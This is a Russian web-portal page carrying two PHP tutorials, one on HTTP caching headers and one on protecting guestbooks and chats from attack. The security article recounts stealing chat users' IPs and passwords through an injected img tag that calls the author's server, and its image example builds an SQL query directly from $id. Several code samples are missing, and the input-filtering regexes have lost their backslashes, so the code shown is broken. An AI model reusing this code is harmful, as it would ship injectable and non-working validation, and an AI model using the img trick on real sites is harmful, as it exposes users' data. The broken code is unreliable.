GreatWeb.RU
- Портал продвинутых юзеров.
Только здесь все о веб-дизайне, раскрутке, выбору хостинга
и не только...
Читайте здесь последние новости интернета!
Форум
продвинутых юзеров. Отличный форум! Задавайте абсолютно
любые вопросы, вам обязательно ответят и помогут решить Ваши
проблемы.
Самым активным пользователям будет выделен красивый почтовый
ящик на 5 mb. Ваше_имя@greatweb.ru
:.::
Новости GreatWeb.Ru:
Самые свежие
темы на нашем форуме: Флейм
Кто какой браузер использует
для серфинга в сети >>>
Кто какой любит music во
время кодинга web сайта ... >>>
Для оптимизации работы с сетью используется механизм
сохранения однажды полученных по HTTP документов в кеше с целью их повторного
использования без обращения к серверу-источнику. Документ, сохраненный в кеше
будет доступен при следующем обращении к нему, без выгрузки с сервера-источника,
что призвано повысить скорость доступа клиента к нему и уменьшить расход трафика
сети. Сами кэши бываю двух видов - локальные и общие. Локальный это кеш,
хранимый непосредственно на диске у клиента, создаваемый и управляемый его
браузером. Общий - кэш прокси-сервера организации или провайдера и может
состоять из одного или нескольких прокси-серверов. Локальный кеш присутствует,
наверное в каждом браузере, общими пользуется значительная часть людей
использующих Internet. И если малую часть сайтов сейчас оценивают по расходу
трафика, то скорость загрузки - важный критерий, который должен учитываться при
разработке Вашего web-проекта. Для динамических страниц, создаваемых в
результате работы PHP-программы, казалось бы, кэширование вредно. Содержание
страницы формируются по запросу пользователя на основе какого-либо источника
данных. Однако, кэширование может быть полезным. Управляя им Вы можете сделать
работу с Вашим сервером комфортнее для пользователя, разрешая загрузку из кэш
определенных страниц, предотвращая тем самым их повторную выгрузку с Вашего
сервера и экономя пользователю время и трафик.
Возможность сохранения в кэш страницы определяется
динамичностью информации в источнике данных. Таким образом необходимость
использования кэша определяется Вами, исходя из планируемого времени жизни
страницы. Если речь идет о формировании выборки по базе (например, поиск
введенного пользователем слова), то такую страница обязательно следует
запрашивать с сервера при каждом вызове без использования кэш, так как
количество вариантов запрашиваемых слов огромно, а если мы к тому же имеем дело
с меняющимся массивом данных, то кэширование бессмысленно. Или речь идет о
формировании допустим графика приходящих посетителей (который изменяется с
каждым визитом, то есть практически с каждым вызовом), то кеширование уже просто
вредно. Однако, если мы говорим о том же графике но за вчерашний день, то
кэширование рекомендуется, так как данные изменяться уже не будут и мы можем
экономить себе и пользователю ресурсы и время на загрузку таких страниц
помещением их в локальный или общий кэш. Как продолжение этой ситуации
формирование графика не в реальном масштабе времени, а ежечасно. Тут Вы можете
заранее предсказать дату окончания "срока годности" сформированных данных.
PHP-программа может управлять кэшированием результатов ее
работы формируя дополнительные поля в заголовке HTTP ответа вызовом функции
Header(). Несколько общих утверждений характерных не только для
PHP-программ:
Страницы передаваемые по POST никогда не сохраняются в кэш.
Страницы запрашиваемые по GET и содержащие параметры (в URL присутствует
'?') не сохраняются в кэш, если не указано обратное.
Таким образом
в большинстве ситуаций дополнительных инструкций в программу добавлять не надо.
Основные моменты на которые следует обратить внимание можно свести к двум:
запрет кэширования документов, кэшируемых по умолчанию
кэширование документов, не подлежащих кэшированию по умолчанию.
Эта задача возникает для PHP-скриптов вызываемых без
параметров или являющимися индексами директорий, однако формирующих данные
персонально под пользователя (например на основе cookies или user agent) или
работающих на основе быстро изменяющихся данных. По спецификации HTTP/1.1 мы
можем управлять следующими полями:
Expires
Задает дату истечения срока годности документа. Задание ее в прошлом
определяет запрет кэш для данной страницы.
Cache-control: no-cache
Управление кэш. Значение no-cache определяет запрет кэш данной страницы.
Для версии протокола HTTP/1.0 действует "Pragma: no-cache".
Last-Modified
Дата послднего изменения содержимого. Поле актуально только для
статических страниц. Apache заменяет это поле значением поля Date для
динамически генерируемых страниц, в том числе для страниц содержащих
SSI.
На сайте www.php.net дается следующий код для запрета кеширования.
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); // Date in the past
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); // always
modified header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
header("Pragma: no-cache"); // HTTP/1.0
Однако, я считаю, что данный
заголовок избыточен. В большинстве случаев достаточно:
header("Expires: Thu, 01 Jan 1970 00:00:01 GMT");
Чтобы пометить
документ как "уже устаревший" следует установить Expires равным полю Date.
header("Expires: " . gmdate("D, d M Y H:i:s") . " GMT");
Ну и не
следует забывать, что формы, запрошенные по POST также не подлежат кэшированию.
Обратная задача, может показаться на первый взгляд
абсурдной. Однако и в этом существует потребность. Кроме простой минимизации
трафика при разработке web-программы следует учитывать комфортность работы с ней
пользователя. Например, некоторые страницы Вашего сервера формируются на основе
статических данных большого объема. Возможность включения их в кэш существенно
улучшит скорость работы сервера для пользователя и частично освободит Ваш от
многочисленных повторных генераций такой страницы. Заголовок разрешающий
сохранение на прокси-серверах:
header("Cache-control: public");
Если страница учитывает информацию
сохраненную в браузере пользователя (тип и версию браузера, ключи, авторизацию и
т.д.) такую страницу нельзя сохранить на прокси, однако возможно ее сохранение в
локальном кэш браузера:
header("Cache-control: private");
Кэширование до истечения корректности
Описанные выше решения довольно прямолинейны, хотя и
подходят для большинства задач. Но протокол HTTP/1.1 имеет средства для более
тонкого управления кэш страниц, и существуют задачи требующие применения этих
механизмов. Как пример - web-приложения работающие с данными большого объема и
прогнозируемой динамичностью. Корректность данных может устанавливаться как по
дате прогнозируемого обновления, так и по изменению содержания. Для этих случаев
используются разные заголовки управления кэш.
Рассмотрим пример - прайс лист обновляемый по
понедельникам. Вы заранее знаете, что содержание страницы можно хранить в кэш до
наступления новой недели, что и следует указать в заголовке ответа обеспечивая
нужное поведение страницы в кэш. Основная задача - получить дату следующего
понедельника в формате RFC-1123
$dt_tmp=getdate(date("U")); header("Expires: " . gmdate("D, d M Y
H:i:s", date("U")-(86400*($dt_tmp["wday"]-8))) . " GMT");
header("Cache-control: public");
Этим методом можно
эффективно управлять поведением страницы в кэш и пременим но для большого числа
страниц - так или иначе можно выделить временные интервалы в течении которых
содержание страницы остается постоянным. Реальное положение вещей таково, что
страницы большинства динамических сайтов имеют определенное время жизни исходя
из которго разработчик может сераер более приятным для работы. Другой
подход, применяемый при более оперативном обновлении информации и одновременной
высокой посещаемости сервера (иначе кэширование не будет эффективным) состоит в
использовании заголовка Cache-control: max-age=секунды, определяющий время по
истечении которого документ считается устаревшим и имеющий больший приоритет при
вычислении "свежести" документа. Если Вы публикуете новости с интервалом в
30 минут:
Еще более интеллектуальный вид управления предоставляет
HTTP/1.1 на основе содержимого с помощью директив Vary. Я очень рекомендую
применять его при формировании изображений или текстов большого объема, которые
как показывает практика изменяются крайне редко. При этом у пользователя в
случае возврата не будет происходить их повторной выгрузки, если содержание
осталось прежним, и страница будет взята с Вашего сервера, если ее содержание
изменилось. Рассмотрим пример выдачи изображения из базы данных
индентифицируемых по ID. Вызов страницы выглядит следующим образом:
http://www.your.server/viewpic.php3?id=23123
а значит по правилам
страница не будет сохраняться в кэш (присутствуют параметры), но через заголовок
можно управлять этим.
mysql_connect("host", "user", "passwd");
$image=mysql("db", "select
pics,type from pictures where id=$id");
Для управления
используется MD5 сумма содержимого изображения. Пока содержание не изменилось,
сумма будет постояной. В случае изменения содержания в базе на сервере клиент
выполнит запрос для повторного формирования содержания. Пока изображение
постоянно содержимое будет отображаться из кэш.
И приятное (или неприятное) сообщение для пользователей Russian
Apache. Так как сервер выдает старину по пользовательской кодировке он
автоматически снабжает ВСЕ страницы (не только динамические) заголовками запрета
кэширования.
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Так что все страницы не
кэшируемые. Формирование в скрипте заголовка Expires эффекта не имеет. Зачем это
сделано и некоторые методы борьбы описаны на apache.lexa.ru и нет необходимости
воспроизводить эти советы здесь. Рассматривая работу PHP+Russian Apache вот как
можно повлиять на кэшируемость. Для скриптов выводящих изображения ситуация
простая - Russian Apache не перекодирует (а значит не устанавливаетсрок
истечения годности) документы имеющие MIME тип image/*. Для использования кэш
текстовых документов видимо следует использовать "Cache-control: private,
max-age=" для разрешения кэширования страниц в браузере. Хотя это теоретическое
предположение, не проверенное на практике.
Данная статья не претендует на роль всеобъемлющего руководства на тему
"как сделать так, чтоб меня никто не поломал". Так не бывает. Единственная
цель этой статьи - показать некоторые используемые мной приемы для защиты
веб-приложений типа WWW-чатов, гостевых книг, веб-форумов и других
приложений подобного рода. Итак, давайте рассмотрим некоторые приемы
программирования на примере некоей гостевой книги, написанной на PHP.
Первой заповедью веб-программиста, желающего написать более-менее
защищенное веб-приложение, должно стать "Никогда не верь данным,
присылаемым тебе пользователем". Пользователи - это по определению такие
злобные хакеры, которые только и ищут момента, как бы напихать в формы
ввода всякую дрянь типа PHP, JavaScript, SSI, вызовов своих жутко
хакерских скриптов и тому подобных ужасных вещей. Поэтому первое, что
необходимо сделать - это жесточайшим образом отфильтровать все данные,
присланные пользователем. Допустим, у нас в гостевой книге существует 3
формы ввода: имя пользователя, его e-mail и само по себе тело сообщения.
Прежде всего, ограничим количество данных, передаваемых из форм ввода
чем-нибудь вроде:
<input type=text name=username maxlength=20>
На роль настоящей защиты, конечно, это претендовать не может -
единственное назначение этого элемента - ограничить пользователя от
случайного ввода имени длиннее 20-ти символов. А для того, чтобы у
пользователя не возникло искушения скачать документ с формами ввода и
подправить параметр maxlength, установим где-нибудь в самом начале
скрипта, обрабатывающего данные, проверку переменной окружения web-сервера
HTTP-REFERER:
Теперь, если данные переданы не из форм документа, находящегося на
сервере www.myserver.com, хацкеру будет выдано деморализующее сообщение.
На самом деле, и это тоже не может служить 100%-ой гарантией того, что
данные ДЕЙСТВИТЕЛЬНО переданы из нашего документа. В конце концов,
переменная HTTP_REFERER формируется браузером, и никто не может помешать
хакеру подправить код браузера, или просто зайти телнетом на 80-ый порт и
сформировать свой запрос. Так что подобная защита годится только от Ну
Совсем Необразованных хакеров. Впрочем, по моим наблюдениям, около 80%
процентов злоумышленников на этом этапе останавливаются и дальше не лезут
- то ли IQ не позволяет, то ли просто лень. Лично я попросту вынес этот
фрагмент кода в отдельный файл, и вызываю его отовсюду, откуда это
возможно. Времени на обращение к переменной уходит немного - а береженого
Бог бережет.
Следующим этапом станет пресловутая жесткая фильтрация переданных
данных. Прежде всего, не будем доверять переменной maxlength в формах
ввода и ручками порежем строку:
$username=substr($username,0,20);
Не дадим
пользователю использовать пустое поле имени - просто так, чтобы не давать
писать анонимные сообщения:
if (empty($username)) {
echo "invalid username";
exit;
}
Запретим пользователю использовать в своем имени любые символы, кроме
букв русского и латинского алфавита, знака "_" (подчерк), пробела и цифр:
if (preg_match("/[^(w)|(x7F-xFF)|(s)]/",$username)) {
echo "invalid username";
exit;
}
Я предпочитаю везде, где нужно что-нибудь более сложное, чем проверить
наличие паттерна в строке или поменять один паттерн на другой,
использовать Перл-совместимые регулярные выражения (Perl-compatible
Regular Expressions). То же самое можно делать и используя стандартные
PHP-шные ereg() и eregi(). Я не буду приводить
здесь эти примеры - это достаточно подробно описано в мануале.
Для поля ввода адреса e-mail добавим в список разрешенных символов
знаки "@" и ".", иначе пользователь не сможет корректно ввести адрес. Зато
уберем русские буквы и пробел:
if (preg_match("/[^(w)|(@)|(.)]/",$usermail)) {
echo "invalid mail";
exit;
}
Поле ввода текста мы не будем подвергать таким жестким репрессиям -
перебирать все знаки препинания, которые можно использовать, попросту
лень, поэтому ограничимся использованием функций nl2br() и
htmlspecialchars() - это не даст врагу понатыкать в текст
сообщения html-тегов. Некоторые разработчики, наверное, скажут: "а мы
все-таки очень хотим, чтобы пользователи _могли_ вставлять теги". Если
сильно неймется - можно сделать некие тегозаменители, типа "текст,
окруженный звездочками, будет высвечен bold'ом.". Но никогда не
следует разрешать пользователям использование тегов, подразумевающих
подключение внешних ресурсов - от тривиального <img> до
супернавороченного <bgsound>.
Как-то раз меня попросили потестировать html-чат. Первым же замеченным
мной багом было именно разрешение вставки картинок. Учитывая еще пару
особенностей строения чата, через несколько минут у меня был файл, в
котором аккуратно были перечислены IP-адреса, имена и пароли всех
присутствовавших в этот момент на чате пользователей. Как? Да очень просто
- чату был послан тег <img
src=http://myserver.com/myscript.pl>, в результате чего браузеры
всех пользователей, присутствовавших в тот момент на чате, вызвали скрипт
myscript.pl с хоста myserver.com. (там не было людей, сидевших под lynx'ом
:-) ). А скрипт, перед тем как выдать location на картинку, свалил мне в
лог-файл половину переменных окружения - в частности QUERY_STRING,
REMOTE_ADDR и других. Для каждого пользователя. С вышеупомянутым
результатом. Посему мое мнение - да, разрешить вставку html-тегов в
чатах, форумах и гостевых книгах - это красиво, но игра не стоит свеч -
вряд ли пользователи пойдут к Вам на книгу или в чат, зная, что их IP
может стать известным первому встречному хакеру. Да и не только IP -
возможности javascript'a я перечислять не буду :-)
Для примитивной гостевой книги перечисленных средств хватит, чтобы
сделать ее более-менее сложной для взлома. Однако для удобства, книги
обычно содержат некоторые возможности для модерирования - как минимум,
возможность удаления сообщений. Разрешенную, естественно, узкому (или не
очень) кругу лиц. Посмотрим, что можно сделать здесь.
Допустим, вся система модерирования книги также состоит из двух частей
- страницы со списком сообщений, где можно отмечать подлежащие удалению
сообщения, и непосредственно скрипта, удаляющего сообщения. Назовем их
соответственно admin1.php и admin2.php.
Простейший и надежнейший способ аутентикации пользователя - размещение
скриптов в директории, защищенной файлом .htaccess. Для преодоления такой
защиты нужно уже не приложение ломать, а web-сервер. Что несколько сложнее
и уж, во всяком случае, не укладывается в рамки темы этой статьи. Однако
не всегда этот способ пригоден к употреблению - иногда бывает надо
проводить авторизацию средствами самого приложения.
Первый, самый простой способ - авторизация средствами HTTP - через код
401. При виде такого кода возврата, любой нормальный браузер высветит
окошко авторизации и попросит ввести логин и пароль. А в дальнейшем
браузер при получении кода 401 будет пытаться подсунуть web-серверу
текущие для данного realm'а логин и пароль, и только в случае неудачи
потребует повторной авторизации. Пример кода для вывода требования на
такую авторизацию есть во всех хрестоматиях и мануалах:
Разместим этот кусочек кода в начале скрипта admin1.php. После его
выполнения, у нас будут две установленные переменные
$PHP_AUTH_USER и PHP_AUTH_PW, в которых
соответственно будут лежать имя и пароль, введенные пользователем. Их
можно, к примеру, проверить по SQL-базе:
***
Внимание!!!*** В приведенном ниже фрагменте кода сознательно допущена
серьезная ошибка в безопасности. Попытайтесь найти ее
самостоятельно.
Упомянутая ошибка, между прочим, очень распространена среди начинающих
и невнимательных программистов. Когда-то я сам поймался на эту удочку - по
счастью, особого вреда это не принесло, не считая оставленных хакером в
новостной ленте нескольких нецензурных фраз. Итак, раскрываю секрет:
допустим, хакер вводит заведомо несуществующее имя пользователя и пустой
пароль. При этом в результате выборки из базы переменная
$rpassword принимает пустое значение. А алгоритм шифрования
паролей при помощи функции СУБД MySQL Password(), так же,
впрочем, как и стандартный алгоритм Unix, при попытке шифрования пустого
пароля возвращает пустое значение. В итоге - $password ==
$rpassword, условие выполняется и взломщик получает доступ к
защищенной части приложения. Лечится это либо запрещением пустых паролей,
либо, на мой взгляд, более правильный путь - вставкой следующего фрагмента
кода:
То есть - проверкой наличия одного и только одного пользователя в базе.
Ни больше, ни меньше. Точно такую же проверку на авторизацию стоит
встроить и в скрипт admin2.php. По идее, если пользователь хороший человек
- то он приходит к admin2.php через admin1.php, а значит, уже является
авторизованным и никаких повторных вопросов ему не будет - браузер
втихомолку передаст пароль. Если же нет - ну, тогда и поругаться не грех.
Скажем, вывести ту же фразу "hacker? he-he...".
К сожалению, не всегда удается воспользоваться алгоритмом авторизации
через код 401 и приходится выполнять ее только средствами приложения. В
общем случае модель такой авторизации будет следующей:
Пользователь один раз авторизуется при помощи веб-формы и скрипта,
который проверяет правильность имени и пароля.
Остальные скрипты защищенной части приложения каким-нибудь образом
проверяют факт авторизованности пользователя.
Такая модель называется сессионной - после прохождения авторизации
открывается так называемая "сессия", в течение которой пользователь имеет
доступ к защищенной части системы. Сессия закрылась - доступ закрывается.
На этом принципе, в частности, строится большинство www-чатов:
пользователь может получить доступ к чату только после того, как пройдет
процедуру входа. Основная сложность данной схемы заключается в том, что
все скрипты защищенной части приложения каким-то образом должны знать о
том, что пользователь, посылающий данные, успешно авторизовался.
Рассмотрим несколько вариантов, как это можно сделать:
После авторизации все скрипты защищенной части вызываются с неким
флажком вида adminmode=1. (Не надо смеяться - я сам такое
видел). Ясно, что любой, кому известен флажок adminmode, может сам
сформировать URL и зайти в режиме администрирования. Кроме того - нет
возможности отличить одного пользователя от другого.
Скрипт авторизации может каким-нибудь образом передать имя
пользователя другим скриптам. Распространено во многих www-чатах - для
того, чтобы отличить, где чье сообщение идет, рядом с формой типа text
для ввода сообщения, пристраивается форма типа hidden, где указывается
имя пользователя. Тоже ненадежно, потому что хакер может скачать
документ с формой к себе на диск и поменять значение формы hidden.
Некоторую пользу здесь может принести вышеупомянутая проверка
HTTP_REFERER - но, как я уже говорил, никаких гарантий она не дает.
Определение пользователя по IP-адресу. В этом случае, после
прохождения авторизации, где-нибудь в локальной базе данных (sql, dbm,
да хоть в txt-файле) сохраняется текущий IP пользователя, а все скрипты
защищенной части смотрят в переменную REMOTE_ADDR и проверяют, есть ли
такой адрес в базе. Если есть - значит, авторизация была, если нет -
"hacker? he-he..." :-) Это более надежный способ - не пройти
авторизацию и получить доступ удастся лишь в том случае, если с того же
IP сидит другой пользователь, успешно авторизовавшийся. Однако, учитывая
распространенность прокси-серверов и IP-Masquerad'инга - это вполне
реально.
Единственным, известным мне простым и достаточно надежным способом
верификации личности пользователя является авторизация при помощи random
uid. Рассмотрим ее более подробно.
После авторизации пользователя скрипт, проведший авторизацию,
генерирует достаточно длинное случайное число:
Это число он: а) заносит в локальный список авторизовавшихся
пользователей; б) Выдает пользователю.
Пользователь при каждом запросе, помимо другой информации (сообщение в
чате, или список сообщений в гостевой книге), отправляет серверу свой uid.
При этом в документе с формами ввода будет присутствовать, наряду с
другими формами, тег вида:
<input type=hidden name=uid value=1234567890>
Форма uid невидима для пользователя, но она передается скрипту
защищенной части приложения. Тот сличает переданный ему uid с uid'ом,
хранящимся в локальной базе и либо выполняет свою функцию, либо...
"hacker? he-he...".
Единственное, что необходимо сделать при такой организации -
периодически чистить локальный список uid'ов и/или сделать для
пользователя кнопку "выход", при нажатии на которую локальный uid
пользователя сотрется из базы на сервере - сессия закрыта.
Некоторые программисты используют в качестве uid не "одноразовое"
динамически генерирующееся число, а пароль пользователя. Это допустимо, но
это является "дурным тоном", поскольку пароль пользователя обычно не
меняется от сессии к сессии, а значит - хакер сможет сам открывать сессии.
Та же самая модель может быть использована везде, где требуется
идентификация пользователя - в чатах, веб-конференциях, электронных
магазинах.
В заключение стоит упомянуть и о такой полезной вещи, как ведение
логов. Если в каждую из описанных процедур встроить возможность занесения
события в лог-файл с указанием IP-адреса потенциального злоумышленника -
то в случае реальной атаки вычислить хакера будет гораздо проще, поскольку
хакеры обычно пробуют последовательно усложняющиеся атаки. Для определения
IP-адреса желательно использовать не только стандартную переменную
REMOTE_ADDR, но и менее известную HTTP_X_FORWARDED_FOR, которая позволяет
определить IP пользователя, находящегося за прокси-сервером. Естественно -
если прокси это позволяет. При ведении лог-файлов, необходимо помнить,
что доступ к ним должен быть только у Вас. Лучше всего, если они будут
расположены за пределами дерева каталогов, доступного через WWW. Если нет
такой возможности - создайте отдельный каталог для лог-файлов и закройте
туда доступ при помощи .htaccess (Deny from all).
Я буду очень признателен, если кто-нибудь из программистов поделится
своими не описанными здесь методами обеспечения безопасности при
разработке приложений для Web.
